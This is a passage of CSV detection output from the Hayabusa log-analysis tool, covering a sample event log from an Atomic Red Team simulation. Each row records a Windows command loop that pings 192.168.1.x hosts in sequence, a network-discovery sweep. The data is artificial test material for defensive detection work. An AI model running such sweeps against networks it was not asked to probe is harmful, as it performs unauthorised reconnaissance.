""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.149 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.150 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.151 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.152 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.153 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.517 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.154 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.155 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.156 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.157 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.158 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.159 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.160 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.161 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.162 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.163 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.164 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.165 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.166 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.011 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.167 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.168 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.169 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.170 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.171 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.172 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.173 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.174 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.175 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.176 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.177 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.178 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.179 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.539 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.180 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.181 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.182 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.183 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.184 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.185 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.186 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.187 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.188 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.022 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 